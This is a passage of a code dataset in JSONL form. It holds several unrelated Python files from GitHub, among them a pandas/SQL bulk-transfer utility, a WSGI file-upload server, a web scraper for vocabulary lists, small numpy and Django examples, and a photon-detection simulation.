2000:\n return None\n\n if self.driver == 'oracle':\n avg_list = [\n (i,\n i +\n self.chunksize) for i in range(\n 1,\n self.count +\n self.chunksize +\n 1,\n self.chunksize)]\n\n else:\n avg_list = [(self.chunksize * i, self.chunksize)\n for i in range(0, self.count // self.chunksize + 1)]\n\n self.db_pool.close_db(con)\n return avg_list\n\n def get_query_count(self, con, sql):\n # _sql = \"select count(*) \" + re.search(r\"from\\s+.*\", sql, re.I).group()\n _sql = f\"select count(*) from ({sql}) t\"\n count = pd.read_sql(_sql, con, **self.pd_params).iloc[0, 0]\n # assert count > 0, DB_Exceptions('DB_EMPTY:')\n return count\n\n def get_thread_result(self,task_list):\n for job in task_list:\n job.result()\n\n def __del__(self):\n if self.show_progress:\n if self.tqdm is not None:\n self.tqdm.update(self.count - self.tqdm.n)\n sys.stdout.flush()\n\n\nclass to_csv(Read_sql):\n\n def __init__(self, *args, path_or_buf=None, **kwargs):\n super(to_csv, self).__init__(*args, **kwargs)\n self.path = path_or_buf\n self.args = None\n self.kwargs = None\n\n def write_csv_header(self):\n if self.driver == 'oracle':\n sql_1 = f'''\n select * from (select rownum no,d.* from (\n {self.sql}\n ) d where rownum<{2}) where no>={1}\n '''\n else:\n sql_1 = f'''\n select * from ({self.sql}) as t limit 1\n '''\n return sql_1\n\n def build_csv(self, *args, **kwargs):\n con = self.db_pool.get_db()\n self.args = args\n self.kwargs = kwargs\n self.kwargs.pop('mode')\n self.kwargs.pop('chunksize')\n self.pd_params = {'columns': None}\n self.avg_list = self.verify_sql()\n self.tqdm_init(self.count, weight=85)\n if self.avg_list is None:\n pd.read_sql(self.sql, con).to_csv(*args, **kwargs)\n self.tqdm_update(self.count)\n else:\n df = pd.read_sql(self.write_csv_header(),con)\n # df = next(pd.read_sql(self.sql, con, chunksize=1)).iloc[1:, ]\n df.to_csv(*args, **kwargs)\n task_list,pool = self.start_thread_read()\n self.db_pool.close_db(con)\n self.get_thread_result(task_list)\n\n self.db_pool.close_db(con)\n return 'finish'\n\n def save_query(self, df_value):\n self.lock.acquire()\n if self.driver == 'oracle':\n df_value.drop(df_value.columns[0], axis=1, inplace=True)\n\n # if self.ordering:\n # df_value.columns = [i.lower() for i in df_value.columns.tolist()]\n # df_value.sort_values([i.strip() for i in self.ordering], inplace=True)\n self.kwargs.update(header=None)\n df_value.ToCsv(*self.args, mode='a', **self.kwargs, )\n self.tqdm_update()\n self.lock.release()\n\n\nclass to_sql(Read_sql):\n\n def __init__(self, *args, **kwargs):\n to_db = kwargs.pop('to_db')\n kwargs.update(con=kwargs.pop('from_db'))\n self.to_table = kwargs.pop('to_table')\n self.to_columns = kwargs.pop('to_columns')\n self.if_exists = kwargs.pop('if_exists')\n self.mode = kwargs.pop('mode').lower()\n self.file_path = kwargs.pop('file_path')\n self.delete_cache = kwargs.pop('delete_cache')\n self.save_path = kwargs.pop('save_path',None)\n self.thread_w = kwargs.pop('thread_w',3)\n self.delete_sql= kwargs.pop('delete_sql',None)\n self.dir_path = None\n self.task_count = None\n self.execute_count = 0\n self.data_processing = kwargs.pop('data_processing',None)\n super().__init__(*args, **kwargs)\n if to_db is not None:\n self.to_db = DB_Pool(to_db, num=8, encoding=kwargs.get('encoding'))\n self.write_driver = self.to_db.driver\n self.lock_b = threading.Lock()\n self.execute_pool = None\n\n def delete_table(self):\n sql = self.sql.replace(\n re.search(\n r'from\\s+(\\S+)',\n self.sql).group(1),\n self.to_table)\n sql = re.sub('(order|ORDER)\\s+(by|BY).*','',sql)\n sql = 'delete ' + re.search('from.*', sql, re.I).group()\n con = self.to_db.get_db()\n db = con.cursor()\n if self.delete_sql is not None:\n sql = self.delete_sql\n db.execute(sql)\n con.commit()\n self.to_db.close_db(con)\n\n\n def decision(self):\n if self.save_path is None:\n self.dir_path = os.path.join(os.getcwd(),f'{uuid.uuid1()}){self.to_table}')\n os.mkdir(self.dir_path)\n else:\n self.dir_path = self.save_path\n self.file_path = self.dir_path\n\n if self.avg_list is None:\n con = self.db_pool.get_db()\n df = pd.read_sql(self.sql, con, **self.pd_params)\n file_path = os.path.join(self.dir_path, f'{uuid.uuid1()}.pkl')\n df.to_pickle(file_path)\n if self.mode in ('wr', 'rw'):\n self.task_count = 1\n self.tqdm_init(self.task_count, weight=85, mode=True)\n self.queue.put(file_path)\n self.write_db()\n else:\n self.tqdm_update(count=self.task_count)\n\n self.db_pool.close_db(con)\n\n else:\n task_list,pool = self.start_thread_read()\n self.task_count = len(self.avg_list)\n if self.mode in ('wr', 'rw'):\n self.tqdm_init(self.task_count, weight=85, mode=True)\n _pool = ThreadPoolExecutor(max_workers=self.thread_w)\n p = [pool.submit(self.write_db) for i in range(5)]\n self.get_thread_result(p)\n self.get_thread_result(task_list)\n\n def rsync_db(self, *args, **kwargs):\n\n self.pd_params = kwargs\n\n self.sql = self.sql.strip().replace('\\n', ' ')\n\n if self.to_table is None:\n self.to_table = re.search(r'from\\s+(\\S+)', self.sql, re.I).group(1)\n\n if self.if_exists == 'delete' and self.mode !='r':\n self.delete_table()\n\n if self.mode == 'w':\n return self.write()\n\n self.avg_list = self.verify_sql()\n self.tqdm_init(self.count, weight=85)\n\n self.decision()\n\n return 'finish'\n\n def write(self):\n file_list = [\n os.path.join(\n self.file_path,\n i) for i in os.listdir(\n self.file_path)]\n self.task_count = len(file_list)\n self.tqdm_w = tqdm(\n total=self.task_count,\n desc=self.desc,\n ncols=80)\n T = ThreadPoolExecutor(max_workers=self.thread_w)\n put_list = [self.queue.put(path) for path in file_list]\n task_list = [T.submit(self.write_db) for i in put_list]\n T.shutdown(wait=True)\n return 'finish'\n\n def save_query(self, df_value):\n file_path = os.path.join(self.dir_path, f'{uuid.uuid1()}.pkl')\n if self.driver == 'oracle':\n df_value.drop(df_value.columns[0], axis=1, inplace=True)\n df_value.to_pickle(file_path)\n self.queue.put(file_path)\n self.tqdm_update()\n\n def get_sys_guid_col(self, columns, con):\n col_type = pd.read_sql(\n f\"select a.COLUMN_NAME,a.DATA_TYPE,a.DATA_SCALE,a.DATA_DEFAULT from all_tab_cols a where TABLE_NAME='{self.to_table.upper()}'\",\n con)\n sys_guid = col_type.loc[col_type['DATA_DEFAULT']\n == ' SYS_GUID() ', 'COLUMN_NAME']\n if not sys_guid.empty:\n columns.remove(sys_guid.values[0])\n return columns\n else:\n return columns\n\n def get_sql(self, columns,):\n insert_col = ','.join(columns)\n # con = self.to_db.get_db()\n if self.write_driver == 'oracle':\n # columns = self.get_sys_guid_col(columns, con)\n sql_col = ':' + ',:'.join([str(i)\n for i in range(1, len(columns) + 1)])\n sql = f'insert into {self.to_table}({insert_col}) values({sql_col})'\n return sql\n\n elif self.write_driver == 'mysql':\n sql_col = '%' + ',%'.join('s' * len(columns))\n insert_col = ','.join([f\"`{i}`\" for i in columns])\n sql = f\"insert into {self.to_table}({insert_col}) values({sql_col})\"\n return sql\n\n @collection_error\n def write_db(self):\n while True:\n self.lock_b.acquire()\n if self.execute_count < self.task_count:\n # df = pd.read_pickle(file_path)\n self.execute_count += 1\n self.lock_b.release()\n path = self.queue.get()\n self.insert_db(path)\n else:\n # self.tqdm_w.update(self.task_count - self.tqdm_w.n)\n self.lock_b.release()\n break\n\n\n def insert_db(self,path):\n df = pd.read_pickle(path)\n df.columns = [i.upper() for i in df.columns]\n if self.data_processing is not None:\n df = self.data_processing(df)\n\n c = [(column, str(date)) for column, date in zip(df.columns.tolist(), df.dtypes) if 'date' in str(date)]\n if self.write_driver == 'mysql':\n for column, date in c:\n df[column] = df[column].astype('str')\n df.replace('NaT', None, inplace=True)\n else:\n for column, date in c:\n df[column] = df[column].astype('object')\n\n df = df.mask(df.isna(), None)\n\n con = self.to_db.get_db()\n db = con.cursor()\n\n if self.to_columns is not None:\n df = df[self.to_columns]\n\n columns = df.columns.tolist()\n sql = self.get_sql(columns)\n\n try:\n db.executemany(sql, df.values.tolist())\n except Exception as e:\n con.rollback()\n raise e\n else:\n con.commit()\n self.tqdm_update(count=1, mode=True)\n finally:\n del df\n db.close()\n con.close()\n\n def __del__(self):\n\n if self.delete_cache:\n if self.mode in ('wr', 'rw') and self.save_path is None:\n shutil.rmtree(self.file_path)\n if self.show_progress:\n if self.tqdm is not None:\n self.tqdm.update(self.count - self.tqdm.n)\n if self.tqdm_w is not None:\n self.tqdm_w.update(self.task_count - self.tqdm_w.n)\n sys.stdout.flush()\n","repo_name":"tosmart01/fastsql","sub_path":"build/lib/fast_sql/fastsql/sql.py","file_name":"sql.py","file_ext":"py","file_size_in_byte":15125,"program_lang":"python","lang":"en","doc_type":"code","stars":103,"dataset":"github-code","pt":"54"} +{"seq_id":"25883700568","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nx=10\r\nprint(pow(x,2),\" - \",pow(x,3))\r\ntheta=np.pi\r\nprint(\"Sin : \" ,np.sin(theta),\" Cos : \",np.cos(theta)) #Radians\r\nmeshpoints=np.linspace(-1,1,500)\r\nprint(meshpoints[52]) #-0.7915831663326653\r\nplt.plot(meshpoints,np.sin(2*np.pi*meshpoints))\r\nplt.show()","repo_name":"ZahraJms/Python-Summer-Class","sub_path":"Ex10 -1 _ Zahra Jamshidi.py","file_name":"Ex10 -1 _ Zahra Jamshidi.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"43410691464","text":"from rest_framework import serializers\n\nimport datetime\n# from corebookmodels.api.serializers import Book, BookSerializers\n\nclass Book:\n def __init__(self, title, year, author):\n self.title = title\n self.year = year\n self.author = author\n\n def __str__(self):\n return f'{self.title} {self.year}'\n\n\nb = Book(title='Kafka on the shore', year=datetime.datetime.now(), author='Murakami')\n\n\ndef checkyear(value):\n get_year = value.year\n if get_year >= 2020:\n raise serializers.ValidationError('YEar must not exceed 2020')\n\n\nclass BookSerializers(serializers.Serializer):\n title = serializers.CharField(max_length=300)\n\n author = serializers.CharField(max_length=300)\n\n year = serializers.DateTimeField(validators=[checkyear])\n\n # def create(self, validated_data):\n # print('created')\n # return Book(**validated_data)\n #\n # def update(self, instance, validated_data):\n # instance.title = validated_data.get('title', instance.title)\n # instance.year = validated_data.get('year', instance.year)\n # instance.author = validated_data.get('author', instance.author)\n # print('updated')\n # return instance\n\n def validate_title(self, value):\n if 'Haruki' not in value.lower():\n raise serializers.ValidationError('Must contain haruki')\n return value\n\n def save(self):\n title = self.validated_data['title']\n author = self.validated_data['author']\n year = self.validated_data['year']\n b = Book(title=title, author=author, year=year)\n print(f'created: {b}')\n\n\nserializer = BookSerializers(b)\n\nprint(serializer.data)\n","repo_name":"psgpyc/kitabalaya","sub_path":"corebookmodels/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"71861468321","text":"#!/usr/bin/python3.4\n\nimport functions\nimport sys\nimport re\nimport json\nimport os\n\nclass Mac_Man(functions.Functions):\n def __init__(self,address): #each object is linked to this one address\n self.tracking = [] #initializes the empty tracking list\n self.switch = []\n self.address = address\n self.load()\n#These are for the local lists - switch and tracking devices\n def check(self,mac): #This is a physical formatting verification\n #Any time this is called, we want it to test that the mac address is valid\n mac_format = re.compile('..:..:..:..:..:..') #Checks the formatting of the mac string\n return re.match(mac_format,mac.strip())\n #Can think about adding this later if it demands greater security\n def refresh(self): #removes duplicates from the lists. Should be automatically called regularly.\n self.tracking = list(set(self.tracking))\n self.switch = list(set(self.switch))\n return None\n def add(self,info):#Really the only function to be called\n #Adds the switchmate information\n if isinstance(info,tuple): #Adds the data regarding switchmate\n try:\n assert self.check(info[0])\n self.switch.append(info)\n self.refresh() #To avoid duplicate values\n except AssertionError:\n print(\"Could not add peripheral info\")\n except IndexError:\n print(\"Add authorization code to update\")\n elif isinstance(info,str): #Adds the tracking info\n try:\n assert self.check(info)\n self.tracking.append(info)\n self.refresh() #To avoid duplicates\n except AssertionError:\n print(\"Could not add tracking info\")\n else:\n pass\n self.save() #Saves the added part\n def remove(self,info):\n if isinstance(info,tuple):\n if info in [i[0] for i in self.switch]: self.switch.remove(info)\n print(\"Removed switch.\")\n elif isinstance(info,str):\n if info in [i.encode('utf-8') for i in self.tracking]: self.tracking.remove(info)\n print(\"Removed peripheral.\")\n self.save()\n\n def prep(self,value=0): #This function preps the mac addresses for processing in the Functions method. Default is to take the first value\n try:\n assert self.tracking\n assert self.switch\n assert len(self.switch[value])==2\n prepped = (self.tracking[value],self.switch[value])\n super(Mac_Man, self).__init__(prepped)\n except:\n print(\"Problems with preparation\")\n#These are for the file storage system\n def reset(self): #Erase the contents of the file\n self.tracking = []\n self.switch = []\n with open(self.address,\"w\"):\n pass\n def load(self): #Grabs the data from the stored file\n try:\n with open(self.address,'a+') as json_data:\n data = json.load(json_data)\n adding_tracking = [self.add(item.encode('utf-8')) for item in data[0]]\n adding_switch = [self.add((item[0].encode('utf-8'),item[1].encode('utf-8'))) for item in data[1]]\n except (AttributeError, ValueError) as e:\n print(\"Data was not loaded.\")\n self.data = [] #This is the default error state\n def save(self):\n #Can be used as a confirmation to verify that the data was indeed saved\n try:\n with open(self.address, 'w+') as f:\n json.dump((self.tracking,self.switch),f)\n except:\n print(\"Unable to save\")\n","repo_name":"IELOCC/IEL_OCC","sub_path":"mac_man.py","file_name":"mac_man.py","file_ext":"py","file_size_in_byte":3662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"274322213","text":"import HTMLParser\nimport argparse\nimport cgi\nimport httplib\nimport logging\nimport os\n\nfrom wsgiref.simple_server import make_server\n\n\nFILE_FIELD_NAME = 'upfile'\n\ndef SendUploadForm(response, uploaded_file_name=None):\n response('200 OK', [('Content-Type','text/html')])\n\n uploaded_file_message = ''\n if uploaded_file_name:\n html_parser = HTMLParser.HTMLParser()\n html_safe_filename = html_parser.unescape(uploaded_file_name)\n uploaded_file_message = ('

File uploaded under name: {0}

'\n .format(html_safe_filename))\n\n return '''\n \n \n

Upload a file

\n {0}\n
\n

\n

\n
\n \n \n '''.format(uploaded_file_message, FILE_FIELD_NAME)\n\n\ndef SendErrorPage(response, error_code, message):\n error_message = httplib.responses[error_code]\n error_status = '%d %s' % (error_code, error_message)\n headers = [('Content-Type','text/html')]\n response(error_status, headers)\n return \"\"\"\n \n \n

{0}

\n

{1}

\n \n \n \"\"\".format(error_status, cgi.escape(message))\n\n\ndef UniqueLocalFilename(filename):\n filename = os.path.split(filename)[1] # strip the path\n local_filename = os.path.join(os.getcwd(), filename)\n\n new_filename = local_filename\n i = 0\n while os.path.exists(new_filename):\n new_filename = '%s-%d' % (local_filename, i)\n i += 1\n\n return new_filename\n\n\ndef SaveFile(filename, data):\n logging.info(\"saving file %r\", filename)\n with open(filename, 'wb') as outfile:\n outfile.write(data.read())\n logging.info(\"saved file as %r\", filename)\n\n\nclass UploaderApp(object):\n ''' Simple WSGI CGI app which controls the upload process. '''\n\n def __call__(self, environ, response):\n if environ['PATH_INFO'] != '/':\n error_message = 'Not found: %s' % (environ['PATH_INFO'],)\n return SendErrorPage(response, httplib.NOT_FOUND, error_message)\n\n handlers = {\n 'GET': self.GET,\n 'POST': self.POST,\n }\n handler = handlers.get(environ['REQUEST_METHOD'], self.DefaultHandler)\n return handler(environ, response)\n\n def DefaultHandler(self, environ, response):\n error_message = 'Method not allowed: %s' % (environ['REQUEST_METHOD'],)\n return SendErrorPage(response, httplib.METHOD_NOT_ALLOWED, error_message)\n\n def POST(self, environ, response):\n field_storage = cgi.FieldStorage(fp=environ['wsgi.input'], environ=environ)\n if FILE_FIELD_NAME not in field_storage:\n return SendErrorPage(response, httplib.PRECONDITION_FAILED,\n 'No file data recieved.')\n upload_field = field_storage[FILE_FIELD_NAME]\n filename = UniqueLocalFilename(upload_field.filename)\n SaveFile(filename, upload_field.file)\n return SendUploadForm(response, filename)\n\n def GET(self, environ, response):\n return SendUploadForm(response)\n\n\ndef ParseArguments():\n ''' Uses argparse to parse command line arguments and flags in sys.argv for\n the cmd-line interface to uploadserver.\n Returns an argparse namespace with the parsed arguments.\n '''\n parser = argparse.ArgumentParser(\n description=('A simple HTTP server which allows files to be uploaded '\n 'to the directory the server was started in.'),\n )\n parser.add_argument('-h', '--host',\n help=('The host to listen on. Defaults to \"0.0.0.0\" to listen on all '\n 'hosts. This allows anyone on the same network to reach '\n 'the server.'),\n default='0.0.0.0',\n )\n parser.add_argument('-p', '--port',\n help='The port number to start the server on. Default is 8000.',\n type=int,\n default=8000,\n )\n return parser.parse_args()\n\n\ndef main():\n logging.basicConfig(level=logging.INFO)\n args = ParseArguments()\n logging.info('Starting HTTP file upload server on host %r and port %d',\n args.host, args.port)\n httpd = make_server(args.host, args.port, UploaderApp())\n httpd.serve_forever()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"cookyt/upload-server","sub_path":"uploadserver.py","file_name":"uploadserver.py","file_ext":"py","file_size_in_byte":4178,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"73474566561","text":"# -*- coding: utf-8 -*-\n\"\"\"\nfetch vocabulary lists from vocabulary.com, thanks for their great work!\n\"\"\"\nimport os\nimport urlparse\nimport bs4\nimport utility\nimport constants\n\n\ndef update_all_lists():\n raw_content = utility.get_raw_content(\n urlparse.urljoin(constants.VOCABULARY_HOME_URL, 'lists'), 'col9 listcats pad2x ')\n if raw_content == '':\n return\n category_raw_content_list = str(raw_content).split('section class')\n for category_raw_content in category_raw_content_list:\n name = utility.extract_info_from_raw(\n category_raw_content, 'sectionHeader').strip()\n if name == '':\n continue\n if name == 'Featured Lists':\n update_list(category_raw_content, 'featured')\n if name == 'Top Rated Lists':\n update_list(category_raw_content, 'top-rated')\n for url_postfix in constants.CATEGORY_DICT.keys():\n url = constants.VOCABULARY_HOME_URL + 'lists/' + url_postfix\n content = utility.get_content_of_url(url)\n soup = str(bs4.BeautifulSoup(content, 'lxml'))\n try:\n if soup.find('bycat hasmore') < 0:\n p('Cannot find phrase \"bycat hasmore\"!')\n p(soup)\n p(url_postfix)\n return\n except:\n return\n update_list(str(soup).split('bycat hasmore')[1], url_postfix)\n utility.show_notification(\n 'Captain Update Vocabulary Lists', 'Update Successfully!')\n return\n\n\ndef get_all_vocabulary_lists():\n result = dict()\n if os.path.exists(constants.LISTS_FEATURED):\n result['featured'] = utility.load_json_file(constants.LISTS_FEATURED)\n if os.path.exists(constants.LISTS_TOP_RATED):\n result['top-rated'] = utility.load_json_file(constants.LISTS_TOP_RATED)\n if os.path.exists(constants.LISTS_TEST_PREP):\n result['test-prep'] = utility.load_json_file(constants.LISTS_TEST_PREP)\n if os.path.exists(constants.LISTS_LITERATURE):\n result['literature'] = utility.load_json_file(\n constants.LISTS_LITERATURE)\n if os.path.exists(constants.LISTS_MORPHOLOGY_ROOTS):\n result['morphology-and-roots'] = utility.load_json_file(\n constants.LISTS_MORPHOLOGY_ROOTS)\n if os.path.exists(constants.LISTS_HISTORICAL_DOCUMENTS):\n result['historical-documents'] = utility.load_json_file(\n constants.LISTS_HISTORICAL_DOCUMENTS)\n if os.path.exists(constants.LISTS_SPEECHES):\n result['speeches'] = utility.load_json_file(constants.LISTS_SPEECHES)\n if os.path.exists(constants.LISTS_JUST_FOR_FUN):\n result['just-for-fun'] = utility.load_json_file(\n constants.LISTS_JUST_FOR_FUN)\n if os.path.exists(constants.LISTS_NEWS):\n result['news'] = utility.load_json_file(constants.LISTS_NEWS)\n return result\n\n\ndef get_lists_by_category(category_name):\n if category_name == 'featured':\n return utility.load_json_file(constants.LISTS_FEATURED)\n if category_name == 'top-rated':\n return utility.load_json_file(constants.LISTS_TOP_RATED)\n if category_name == 'test-prep':\n return utility.load_json_file(constants.LISTS_TEST_PREP)\n if category_name == 'literature':\n return utility.load_json_file(constants.LISTS_LITERATURE)\n if category_name == 'morphology-and-roots':\n return utility.load_json_file(constants.LISTS_MORPHOLOGY_ROOTS)\n if category_name == 'historical-documents':\n return utility.load_json_file(constants.LISTS_HISTORICAL_DOCUMENTS)\n if category_name == 'speeches':\n return utility.load_json_file(constants.LISTS_SPEECHES)\n if category_name == 'just-for-fun':\n return utility.load_json_file(constants.LISTS_JUST_FOR_FUN)\n if category_name == 'news':\n return utility.load_json_file(constants.LISTS_NEWS)\n\n\ndef get_list_data(category_name, list_name):\n if category_name == 'featured':\n return get_value_by_key(utility.load_json_file(constants.LISTS_FEATURED), list_name)\n if category_name == 'top-rated':\n return get_value_by_key(utility.load_json_file(constants.LISTS_TOP_RATED), list_name)\n if category_name == 'test-prep':\n return get_value_by_key(utility.load_json_file(constants.LISTS_TEST_PREP), list_name)\n if category_name == 'literature':\n return get_value_by_key(utility.load_json_file(constants.LISTS_LITERATURE), list_name)\n if category_name == 'morphology-and-roots':\n return get_value_by_key(utility.load_json_file(constants.LISTS_MORPHOLOGY_ROOTS), list_name)\n if category_name == 'historical-documents':\n return get_value_by_key(utility.load_json_file(constants.LISTS_HISTORICAL_DOCUMENTS), list_name)\n if category_name == 'speeches':\n return get_value_by_key(utility.load_json_file(constants.LISTS_SPEECHES), list_name)\n if category_name == 'just-for-fun':\n return get_value_by_key(utility.load_json_file(constants.LISTS_JUST_FOR_FUN), list_name)\n if category_name == 'news':\n return get_value_by_key(utility.load_json_file(constants.LISTS_NEWS), list_name)\n\n\ndef get_value_by_key(dict_data, key):\n if key in dict_data:\n return dict_data[key]\n else:\n return None\n\n\ndef write_lists_by_category_and_data(category_name, lists_data):\n if category_name == 'featured':\n utility.write_json_file(constants.LISTS_FEATURED, lists_data)\n if category_name == 'top-rated':\n utility.write_json_file(constants.LISTS_TOP_RATED, lists_data)\n if category_name == 'test-prep':\n utility.write_json_file(constants.LISTS_TEST_PREP, lists_data)\n if category_name == 'literature':\n utility.write_json_file(constants.LISTS_LITERATURE, lists_data)\n if category_name == 'morphology-and-roots':\n utility.write_json_file(constants.LISTS_MORPHOLOGY_ROOTS, lists_data)\n if category_name == 'historical-documents':\n utility.write_json_file(\n constants.LISTS_HISTORICAL_DOCUMENTS, lists_data)\n if category_name == 'speeches':\n utility.write_json_file(constants.LISTS_SPEECHES, lists_data)\n if category_name == 'just-for-fun':\n utility.write_json_file(constants.LISTS_JUST_FOR_FUN, lists_data)\n if category_name == 'news':\n utility.write_json_file(constants.LISTS_NEWS, lists_data)\n\n\ndef update_list(category_raw_content, category_name):\n \"\"\"\n get all of list detailed information from category\n \"\"\"\n category_lists_dict = get_lists_by_category(category_name)\n\n item_raw_content_list = category_raw_content.split('wordlist shortlisting')\n for item_raw_content in item_raw_content_list[1:]:\n list_name = utility.extract_info_from_raw(\n item_raw_content.replace('#', ''), 'href')\n if list_name in category_lists_dict:\n continue\n\n list_brief_description = utility.extract_info_from_raw(\n item_raw_content, 'description')\n if len(list_brief_description) > 160:\n list_brief_description = list_brief_description[:160] + '...'\n list_words_num = utility.extract_info_from_raw(\n item_raw_content, 'readMore')\n list_href = extract_detailed_address(item_raw_content)\n if list_name == '' or list_href == '':\n continue\n\n category_lists_dict[list_name] = dict()\n category_lists_dict[list_name]['list_brief_description'] = list_brief_description\n category_lists_dict[list_name]['list_num'] = list_words_num\n category_lists_dict[list_name]['list_href'] = list_href\n category_lists_dict[list_name]['list_detailed_info'] = []\n\n # ------------------------------------------\n # detailed_description of list\n entire_list_url = urlparse.urljoin(\n constants.VOCABULARY_HOME_URL, list_href)\n raw_words_list_description = utility.get_raw_content(\n entire_list_url, 'description')\n if raw_words_list_description is not None:\n words_list_description = utility.extract_info_from_raw(\n raw_words_list_description, 'description')\n category_lists_dict[list_name]['list_detailed_description'] = words_list_description\n\n raw_words_list_content_list = utility.get_raw_content(\n entire_list_url, 'centeredContent').split('class=\\\"entry learnable\\\"')\n\n for content in raw_words_list_content_list:\n if 'class=\"definition\"' not in content:\n raw_words_list_content_list.remove(content)\n for index, raw_words_list_content in enumerate(raw_words_list_content_list):\n raw_words_list_content = raw_words_list_content.replace(\n '&', '&')\n raw_words_list_content = raw_words_list_content.replace('\\n', ' ')\n raw_words_list_content = raw_words_list_content.replace('', '')\n raw_words_list_content = raw_words_list_content.replace('', '')\n raw_words_list_content = raw_words_list_content.replace('', '')\n raw_words_list_content = raw_words_list_content.replace(\n '', '')\n raw_words_list_content = raw_words_list_content.replace(\n '', '')\n raw_words_list_content = raw_words_list_content.replace(\n '', '')\n raw_words_list_content = raw_words_list_content.replace('
', '')\n name = utility.extract_info_from_raw(\n raw_words_list_content, 'href')\n if name == \"definitions & notes\":\n continue\n\n definition = utility.extract_info_from_raw(\n raw_words_list_content, '\\\"definition\\\"')\n example = utility.extract_info_from_raw(\n raw_words_list_content, '\\\"example\\\"')\n description = utility.extract_info_from_raw(\n raw_words_list_content, '\\\"description\\\"')\n\n list_detailed_info_dict = dict()\n list_detailed_info_dict[name] = name\n list_detailed_info_dict[name] = dict()\n list_detailed_info_dict[name]['index'] = index\n list_detailed_info_dict[name]['word_definition'] = definition\n list_detailed_info_dict[name]['word_example'] = example\n list_detailed_info_dict[name]['word_description'] = description\n\n category_lists_dict[list_name]['list_detailed_info'].append(\n list_detailed_info_dict)\n\n write_lists_by_category_and_data(category_name, category_lists_dict)\n\n\ndef extract_detailed_address(raw_content):\n \"\"\"\n :param raw_content:\n :return: return list address, such as 'lists/1752913'\n \"\"\"\n try:\n point_one_index = raw_content.index('href')\n except:\n return ''\n left_colon_index = raw_content[point_one_index:].index(\n '\"') + point_one_index + 1\n right_colon_index = raw_content[left_colon_index:].index(\n '\"') + left_colon_index\n return raw_content[left_colon_index:right_colon_index]\n\n\nif __name__ == \"__main__\":\n update_all_lists()\n","repo_name":"leowucn/captain","sub_path":"src/learn_english/model/vocabulary_list.py","file_name":"vocabulary_list.py","file_ext":"py","file_size_in_byte":11009,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"29068305420","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n# --- Calculating efficiency based on assumption that ---\n# --- there can be as many photons per write/read gate---\n\n# No noise, no dephasing is taken into account here\n\np = np.arange(0.01,1,0.01) # p ranging from 0 to 1\neta_det = 0.05 # Detection efficiency (same for write and read here)\neta_read = 0.5 # Readout efficiency\npw_geo = eta_det*(1/(1-p)-1) #pw, based on geometric series\npwr_geo = eta_det**2*(1/(1-p)-1)*eta_read # pwr, based on geometric series\n\n# --- Calculating efficiency based on assumption that ---\n# --- only one photon can be detected per write/read gate ---\n\npw = np.zeros(len(p))\npwr = np.zeros(len(p))\n\nfor i,x in enumerate(p):\n print(f'\\nprobability: {x}')\n pw_list = np.zeros(100)\n pwr_list = np.zeros(100)\n for n in range(len(pw_list)):\n pw_list[n] = eta_det*x**(n+1)*(1-np.sum(pw_list))\n pwr_list[n] = eta_det**2*x**(n+1)*eta_read*(1-np.sum(pwr_list))\n print(f'n: {n}')\n print(f'\\tpw_list[n]:{pw_list[n]}, \\tpr_list[n] {pwr_list[n]}')\n \n pw[i] = np.sum(pw_list)\n pwr[i] = np.sum(pwr_list)\n print(pw[i])\n\nprw = pwr/pw\n\n#%% --- Plotting\nplt.figure(0)\nplt.plot(p,pw*100, label = r'$p_w$')\nplt.plot(p,pwr*100, label = r'$p_{w,r}$')\nplt.plot(p,prw*100, label = r'$p_{r|w}$')\nplt.plot(p,pw_geo*100, label = r'$p_{w}$ (geo)')\nplt.plot(p,pwr_geo*100, label = r'$p_{w,r}$ (geo)')\nplt.ylabel(r'p [%]')\nplt.xlabel(r'$p$')\nplt.ylim([0,110])\nplt.xlim([0,1])\nplt.legend()\nplt.grid()\n\n#%% --- Full Simulation of countrates ---\n\nN = 100000 # number of trials\ndead = 40 # deadtime of detector\nwidth_w = 300 # width of pulse\n\nemitted_photons = np.random.normal(0,width_w,N)\n\ntemp_list = []\nfor _ in range(5):\n emitted_photons = np.random.normal(0,width_w,N)\n kickout = np.ones(len(emitted_photons), dtype = bool)\n for i,photon_1 in enumerate(emitted_photons[:-1]):\n if np.abs(photon_1 - emitted_photons[i+1]) < dead and emitted_photons[i+1]> photon_1:\n kickout[i] = False\n temp_list.append(len(emitted_photons[kickout])/N)\n\naverage = np.array(temp_list).mean()\nprint(f'Average detection probability: {average} %')\n \nplt.figure(1)\ndetected_photons = emitted_photons[kickout]\ncount, bins, ignored = plt.hist(detected_photons, 100, density=False)\nplt.plot(bins, 1/(width_w * np.sqrt(2 * np.pi)) *\n np.exp( - (bins - 0)**2 / (2 * width_w**2) )*N*(bins[1]-bins[0]),\n linewidth=2, color='r') \n \n \n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"LukasHeller/simulations","sub_path":"probabilities_including_real_detection.py","file_name":"probabilities_including_real_detection.py","file_ext":"py","file_size_in_byte":2525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"8291945159","text":"\"\"\"\n238. 除自身以外数组的乘积\n数组 前缀和\n中等\n\n\n给你一个长度为 n 的整数数组 nums,其中 n > 1,返回输出数组 output ,其中 output[i] 等于 nums 中除 nums[i] 之外其余各元素的乘积。\n\n \n\n示例:\n\n输入: [1,2,3,4]\n输出: [24,12,8,6]\n \n\n提示:题目数据保证数组之中任意元素的全部前缀元素和后缀(甚至是整个数组)的乘积都在 32 位整数范围内。\n\n说明: 请不要使用除法,且在 O(n) 时间复杂度内完成此题。\n\n进阶:\n你可以在常数空间复杂度内完成这个题目吗?( 出于对空间复杂度分析的目的,输出数组不被视为额外空间。)\n\n来源:力扣(LeetCode)\n链接:https://leetcode-cn.com/problems/product-of-array-except-self\n\"\"\"\nfrom typing import List\n\n\nclass Solution:\n def productExceptSelf(self, nums: List[int]) 